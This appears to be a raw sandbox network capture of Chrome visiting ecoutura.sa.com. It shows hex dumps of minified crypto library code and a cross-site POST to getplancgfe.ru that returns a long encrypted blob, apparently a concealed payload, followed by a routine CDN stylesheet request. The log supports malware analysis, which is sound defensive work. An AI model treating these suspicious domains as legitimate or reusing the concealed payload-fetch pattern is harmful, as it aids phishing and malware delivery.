                                                                                        2024-11-01 12:46:29 UTC1369INData Raw: 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d
                                                                                        Data Ascii: ,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]
                                                                                        2024-11-01 12:46:29 UTC1369INData Raw: 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29
                                                                                        Data Ascii: 092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)
                                                                                        2024-11-01 12:46:29 UTC1369INData Raw: 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32
                                                                                        Data Ascii: >>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42
                                                                                        2024-11-01 12:46:29 UTC1369INData Raw: 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b
                                                                                        Data Ascii: ),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[
                                                                                        2024-11-01 12:46:30 UTC1369INData Raw: 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72
                                                                                        Data Ascii: i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;retur
                                                                                        2024-11-01 12:46:30 UTC1369INData Raw: 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72
                                                                                        Data Ascii: (o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.449781172.67.130.974435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:30 UTC604OUTPOST // HTTP/1.1
                                                                                        Host: getplancgfe.ru
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 23
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                        Accept: */*
                                                                                        Origin: https://ecoutura.sa.com
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://ecoutura.sa.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:30 UTC23OUTData Raw: 7b 22 77 61 66 66 6c 65 22 3a 22 72 61 64 61 72 73 63 6f 70 65 22 7d
                                                                                        Data Ascii: {"waffle":"radarscope"}
                                                                                        2024-11-01 12:46:33 UTC843INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:33 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.3.33
                                                                                        access-control-allow-origin: *
                                                                                        vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBencSKAFnB0CYlPu5DOXmW3oQjvkXpnQ3Fr0esHIoxixlaazcw1YJA9pP2WqICqpIGbmhte5mp0cTyFYE3wHLSNj4iXfm8AXL4LRXPcJnBfA4ox%2BlLwuIZfaJ5zDo4IsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfcefdec64796-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1747&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1227&delivery_rate=1609783&cwnd=244&unsent_bytes=0&cid=5a725602d4609d77&ts=2897&x=0"
                                                                                        2024-11-01 12:46:33 UTC526INData Raw: 32 37 33 66 0d 0a 7b 22 61 22 3a 22 51 6a 33 4a 35 48 46 67 6b 41 71 63 75 59 64 71 30 73 76 4c 6d 6e 6e 45 66 67 5c 2f 6d 51 4c 48 31 6d 4e 62 58 48 4b 48 6c 77 4c 75 39 6c 68 64 76 42 6d 32 43 72 76 34 61 7a 37 57 61 61 35 6f 4c 5c 2f 49 74 62 62 38 4f 75 38 51 47 46 69 30 4e 34 4f 38 37 50 53 53 5c 2f 4c 33 6b 45 5a 55 65 68 72 4f 48 30 4b 62 7a 62 45 61 54 37 46 4f 51 69 59 49 74 63 4c 66 47 5c 2f 62 48 59 49 5c 2f 73 4b 52 54 6e 48 4c 52 66 6f 55 70 35 62 32 72 62 4f 72 69 4b 63 4c 72 74 30 5a 33 64 70 34 67 6b 35 71 4b 53 32 52 36 6c 53 45 57 6a 6c 56 53 46 42 49 5a 42 70 59 79 62 6d 38 73 6c 44 6e 6e 4c 6d 52 6f 31 4a 35 47 6b 4c 5c 2f 79 4c 2b 5c 2f 4a 77 53 57 4a 6f 50 41 43 6f 33 50 75 6a 33 34 73 63 64 59 71 5a 4d 57 73 50 55 5a 4d 6e 49 70 35
                                                                                        Data Ascii: 273f{"a":"Qj3J5HFgkAqcuYdq0svLmnnEfg\/mQLH1mNbXHKHlwLu9lhdvBm2Crv4az7Waa5oL\/Itbb8Ou8QGFi0N4O87PSS\/L3kEZUehrOH0KbzbEaT7FOQiYItcLfG\/bHYI\/sKRTnHLRfoUp5b2rbOriKcLrt0Z3dp4gk5qKS2R6lSEWjlVSFBIZBpYybm8slDnnLmRo1J5GkL\/yL+\/JwSWJoPACo3Puj34scdYqZMWsPUZMnIp5
                                                                                        2024-11-01 12:46:33 UTC1369INData Raw: 76 55 6b 4a 7a 6a 5c 2f 49 64 30 50 53 78 67 35 49 79 53 46 71 77 32 5a 39 73 64 37 43 57 62 47 4d 6b 35 41 4a 69 63 46 34 78 61 30 2b 62 50 61 73 7a 36 56 36 55 76 58 47 6d 76 69 44 45 43 47 64 37 5c 2f 41 4e 7a 31 48 30 55 6a 58 61 36 30 35 67 39 37 68 33 52 42 76 57 6c 73 39 4f 4e 44 2b 68 32 79 30 67 59 7a 49 71 79 6c 67 39 67 39 5c 2f 52 6d 4a 32 55 43 45 62 59 4c 57 4f 76 75 43 4d 7a 77 75 59 67 46 5c 2f 71 5c 2f 64 49 4f 68 57 6b 31 36 41 4b 6c 77 41 74 63 70 42 57 78 73 36 54 75 5a 77 55 71 5a 58 76 52 70 7a 58 48 62 51 5a 46 38 65 73 73 5a 66 41 54 69 69 76 48 74 65 42 37 50 68 64 5a 78 31 62 34 73 41 73 54 42 6f 2b 4d 6d 71 34 76 30 77 5c 2f 6f 48 76 30 32 7a 6a 68 39 77 69 62 2b 4d 56 43 78 37 59 4c 32 73 63 6c 51 41 59 6a 57 53 6e 62 78 52 64
                                                                                        Data Ascii: vUkJzj\/Id0PSxg5IySFqw2Z9sd7CWbGMk5AJicF4xa0+bPasz6V6UvXGmviDECGd7\/ANz1H0UjXa605g97h3RBvWls9OND+h2y0gYzIqylg9g9\/RmJ2UCEbYLWOvuCMzwuYgF\/q\/dIOhWk16AKlwAtcpBWxs6TuZwUqZXvRpzXHbQZF8essZfATiivHteB7PhdZx1b4sAsTBo+Mmq4v0w\/oHv02zjh9wib+MVCx7YL2sclQAYjWSnbxRd
                                                                                        2024-11-01 12:46:33 UTC1369INData Raw: 45 6a 64 4d 56 6c 35 63 48 73 71 4b 6f 63 62 4c 41 58 43 66 31 57 4c 46 38 49 34 68 75 69 77 67 53 46 6b 68 4d 77 69 72 33 38 63 54 6d 69 6c 63 42 58 44 6c 57 48 4f 45 79 70 44 6c 34 70 52 77 6d 5c 2f 54 47 48 42 5c 2f 50 37 4c 65 39 51 61 50 50 36 36 57 49 75 6f 48 4d 79 42 4e 4d 38 4a 6c 51 34 56 46 31 31 4c 79 75 63 4c 70 47 52 57 36 76 5c 2f 78 4f 50 33 53 67 65 71 30 61 61 4a 63 49 4e 5c 2f 64 55 41 59 63 36 57 65 56 31 69 50 64 57 6f 69 5a 77 47 63 56 37 62 65 39 31 30 4c 4e 57 65 43 51 58 73 76 6b 35 4f 72 5c 2f 37 2b 36 70 43 31 42 39 59 63 54 73 57 43 65 52 52 59 44 42 76 4c 4f 6d 50 5a 4e 51 43 61 32 78 69 71 50 5a 6a 50 61 70 30 46 79 65 45 4c 6a 4d 63 55 45 7a 6e 4a 5a 4d 47 54 58 76 68 6b 6a 71 31 51 49 6c 6f 66 38 48 32 48 77 41 58 48 6d 4e
                                                                                        Data Ascii: EjdMVl5cHsqKocbLAXCf1WLF8I4huiwgSFkhMwir38cTmilcBXDlWHOEypDl4pRwm\/TGHB\/P7Le9QaPP66WIuoHMyBNM8JlQ4VF11LyucLpGRW6v\/xOP3Sgeq0aaJcIN\/dUAYc6WeV1iPdWoiZwGcV7be910LNWeCQXsvk5Or\/7+6pC1B9YcTsWCeRRYDBvLOmPZNQCa2xiqPZjPap0FyeELjMcUEznJZMGTXvhkjq1QIlof8H2HwAXHmN
                                                                                        2024-11-01 12:46:33 UTC1369INData Raw: 43 76 66 5c 2f 72 65 41 30 4a 30 52 68 4d 35 49 6f 62 44 64 71 6c 5c 2f 61 64 6a 63 45 4f 5c 2f 4b 4d 47 32 49 79 52 6a 6e 4e 53 76 65 76 57 62 32 41 47 69 4a 4f 64 63 6b 72 63 72 63 77 4c 79 72 56 54 6a 44 67 54 67 41 71 76 75 43 31 58 58 63 75 4c 56 70 73 67 4a 32 67 66 39 77 5a 69 69 50 31 6f 6f 62 74 4c 68 79 46 69 4a 4b 30 58 76 36 4f 2b 78 6e 55 6f 50 63 75 47 49 46 2b 6b 61 58 6a 44 45 6c 75 44 4d 66 56 63 37 35 74 33 6f 41 56 48 4f 66 47 7a 41 57 48 41 66 63 42 30 57 74 31 66 47 37 4f 4d 73 75 78 55 68 39 73 72 42 6d 5c 2f 52 67 41 59 69 6f 49 6c 30 59 4e 6c 31 68 61 68 37 38 5a 53 6b 6a 62 72 72 58 79 4b 51 59 6f 58 4b 62 65 53 66 63 36 33 4b 45 36 61 42 75 45 4a 32 2b 6c 4b 69 57 4a 71 74 76 57 77 64 51 32 65 33 58 6e 32 4a 39 2b 68 4a 44 34 33
                                                                                        Data Ascii: Cvf\/reA0J0RhM5IobDdql\/adjcEO\/KMG2IyRjnNSvevWb2AGiJOdckrcrcwLyrVTjDgTgAqvuC1XXcuLVpsgJ2gf9wZiiP1oobtLhyFiJK0Xv6O+xnUoPcuGIF+kaXjDEluDMfVc75t3oAVHOfGzAWHAfcB0Wt1fG7OMsuxUh9srBm\/RgAYioIl0YNl1hah78ZSkjbrrXyKQYoXKbeSfc63KE6aBuEJ2+lKiWJqtvWwdQ2e3Xn2J9+hJD43
                                                                                        2024-11-01 12:46:33 UTC1369INData Raw: 70 56 39 72 6f 54 63 75 7a 4b 56 57 39 74 4d 6a 78 5a 67 66 36 46 78 4c 59 39 45 64 7a 5a 63 6f 72 62 39 48 61 69 77 45 74 68 56 59 53 43 51 6a 73 6c 74 4c 52 70 52 75 46 71 51 70 66 33 46 39 47 72 6d 35 79 64 56 4b 61 55 42 50 74 2b 77 51 7a 4c 49 71 33 62 6a 45 59 56 50 71 5c 2f 34 6e 64 39 66 53 66 63 7a 34 35 62 58 6f 74 62 72 54 6f 7a 73 51 4c 77 30 34 50 64 4a 62 5c 2f 5a 34 5c 2f 51 38 6c 63 6d 48 4f 65 6c 46 77 35 76 6d 59 6b 55 47 78 43 33 49 36 46 50 33 35 4d 6f 5a 68 33 46 33 37 62 6b 30 36 72 77 59 5c 2f 48 37 64 71 72 41 6d 55 33 35 6b 32 49 7a 65 6b 68 6d 6d 56 69 73 30 37 41 52 41 74 75 6a 6d 77 71 39 56 31 6a 32 77 6d 7a 56 45 42 39 62 48 7a 46 45 5c 2f 42 31 33 4d 70 55 57 47 6d 65 4b 53 45 4f 49 7a 69 5a 57 59 68 4a 67 76 69 54 74 79 73
                                                                                        Data Ascii: pV9roTcuzKVW9tMjxZgf6FxLY9EdzZcorb9HaiwEthVYSCQjsltLRpRuFqQpf3F9Grm5ydVKaUBPt+wQzLIq3bjEYVPq\/4nd9fSfcz45bXotbrTozsQLw04PdJb\/Z4\/Q8lcmHOelFw5vmYkUGxC3I6FP35MoZh3F37bk06rwY\/H7dqrAmU35k2IzekhmmVis07ARAtujmwq9V1j2wmzVEB9bHzFE\/B13MpUWGmeKSEOIziZWYhJgviTtys
                                                                                        2024-11-01 12:46:33 UTC1369INData Raw: 74 6c 57 53 42 59 4d 76 4b 6d 52 76 36 65 37 36 30 46 34 57 42 6a 57 78 74 39 36 67 31 44 58 72 65 57 65 65 55 56 67 38 5a 49 50 7a 51 4b 63 6d 75 56 63 4f 4d 43 76 79 6e 79 57 5a 4d 4d 70 50 68 4d 36 4f 55 2b 72 39 55 78 6b 7a 78 57 45 7a 4b 46 46 66 6b 75 43 69 48 4e 57 4b 35 73 69 32 69 34 69 61 42 75 43 31 72 5a 6b 6c 6a 39 44 75 53 54 52 79 77 2b 73 33 79 4f 7a 52 74 63 43 48 4a 41 62 51 49 7a 6d 52 77 57 75 78 33 65 54 56 5a 50 32 32 47 79 69 6d 68 6e 49 37 58 54 56 4b 39 43 37 67 53 57 65 5c 2f 72 5c 2f 53 63 64 6d 37 34 43 64 71 46 4c 72 48 75 6d 55 70 50 4e 2b 33 41 39 33 35 72 54 68 67 4f 56 78 62 6e 69 61 42 6e 52 68 7a 62 50 47 43 69 50 55 31 65 48 4e 37 65 54 53 79 58 78 31 6b 72 49 64 61 75 6c 56 61 31 71 6f 42 6d 5c 2f 4d 70 54 75 73 30 78
                                                                                        Data Ascii: tlWSBYMvKmRv6e760F4WBjWxt96g1DXreWeeUVg8ZIPzQKcmuVcOMCvynyWZMMpPhM6OU+r9UxkzxWEzKFFfkuCiHNWK5si2i4iaBuC1rZklj9DuSTRyw+s3yOzRtcCHJAbQIzmRwWux3eTVZP22GyimhnI7XTVK9C7gSWe\/r\/Scdm74CdqFLrHumUpPN+3A935rThgOVxbniaBnRhzbPGCiPU1eHN7eTSyXx1krIdaulVa1qoBm\/MpTus0x
                                                                                        2024-11-01 12:46:33 UTC1369INData Raw: 67 4c 49 58 5a 43 6b 6f 4a 45 46 73 2b 5a 6a 48 68 54 58 4f 42 4a 76 5c 2f 55 53 4f 34 43 41 5a 47 34 4f 49 50 63 67 71 5c 2f 4c 57 6c 5c 2f 48 35 4c 73 4b 4b 5c 2f 68 4f 30 6f 32 51 47 49 4f 46 33 43 78 75 67 70 6b 42 78 78 6d 52 32 5a 6b 6f 5a 41 41 43 43 75 34 59 59 61 50 47 50 78 5c 2f 41 2b 6a 54 6a 31 6c 55 39 37 66 56 64 44 34 56 63 59 31 37 70 50 41 43 5a 57 63 6d 79 34 56 54 6c 54 30 69 51 71 47 31 4e 47 73 45 57 4b 61 61 44 34 31 62 6b 5a 46 33 6c 39 4b 55 65 61 71 62 61 73 6f 56 49 6d 4c 33 36 6b 46 77 4a 45 52 48 62 44 4e 54 6e 77 52 48 39 31 4f 64 30 34 54 5c 2f 67 30 36 68 70 74 36 5c 2f 37 77 6d 79 41 35 6e 61 35 61 71 6b 61 38 6e 62 67 65 78 55 73 58 41 59 41 2b 5a 74 76 61 4c 34 32 46 35 69 6a 52 71 76 2b 69 48 51 38 59 46 62 68 32 58 43
                                                                                        Data Ascii: gLIXZCkoJEFs+ZjHhTXOBJv\/USO4CAZG4OIPcgq\/LWl\/H5LsKK\/hO0o2QGIOF3CxugpkBxxmR2ZkoZAACCu4YYaPGPx\/A+jTj1lU97fVdD4VcY17pPACZWcmy4VTlT0iQqG1NGsEWKaaD41bkZF3l9KUeaqbasoVImL36kFwJERHbDNTnwRH91Od04T\/g06hpt6\/7wmyA5na5aqka8nbgexUsXAYA+ZtvaL42F5ijRqv+iHQ8YFbh2XC
                                                                                        2024-11-01 12:46:33 UTC1315INData Raw: 58 6d 62 41 74 33 30 41 54 64 65 72 4d 33 73 62 49 6f 57 7a 71 57 4b 74 7a 68 6b 47 70 4f 45 6e 6b 4e 46 42 46 37 52 55 2b 51 78 72 56 43 70 37 78 77 51 53 37 75 42 70 72 56 4c 44 49 49 42 2b 43 57 33 6d 64 77 4e 33 32 6b 30 76 4c 46 66 5c 2f 4b 61 43 33 52 45 77 36 33 65 4a 6f 37 32 43 55 56 75 4a 49 72 42 71 71 74 69 46 32 79 61 64 51 59 39 53 4d 35 54 37 6d 31 62 65 6c 63 58 2b 4d 79 55 72 71 54 4b 48 63 30 42 65 44 48 51 38 39 32 78 4f 72 66 55 6a 6e 53 7a 79 67 50 6e 4a 58 46 69 4f 53 37 52 65 4a 70 53 45 75 66 6a 50 73 4a 5a 42 4e 59 42 30 74 31 73 67 56 7a 35 4e 2b 73 73 31 43 65 79 56 53 73 51 64 6a 4c 59 66 50 33 37 2b 51 73 6e 48 53 64 42 41 58 54 50 68 74 6f 4e 6f 57 75 51 68 48 70 37 6a 78 33 73 5c 2f 46 5c 2f 56 62 72 6f 5a 77 62 58 4f 31 51
                                                                                        Data Ascii: XmbAt30ATderM3sbIoWzqWKtzhkGpOEnkNFBF7RU+QxrVCp7xwQS7uBprVLDIIB+CW3mdwN32k0vLFf\/KaC3REw63eJo72CUVuJIrBqqtiF2yadQY9SM5T7m1belcX+MyUrqTKHc0BeDHQ892xOrfUjnSzygPnJXFiOS7ReJpSEufjPsJZBNYB0t1sgVz5N+ss1CeyVSsQdjLYfP37+QsnHSdBAXTPhtoNoWuQhHp7jx3s\/F\/VbroZwbXO1Q
                                                                                        2024-11-01 12:46:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.449783104.17.24.144435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:34 UTC577OUTGET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: text/css,*/*;q=0.1
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: style
                                                                                        Referer: https://ecoutura.sa.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:35 UTC946INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:35 GMT
                                                                                        Content-Type: text/css; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: W/"656632a7-54f3"
                                                                                        Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 752954
                                                                                        Expires: Wed, 22 Oct 2025 12:46:35 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnplYXNQDAvgTfn4fbt4Y%2Bv2I3gt28lMRZh99ORitb0Zd9Q5L1O7nj9flicU9wSdwtJOf6n4kgEe%2FUxgRZh9i8a8pM9%2BLO%2BqT3VWLBDOghuse3jJFYVpDg7TsMQ39DDXOI2r2kVn"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd0d0c49478e-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
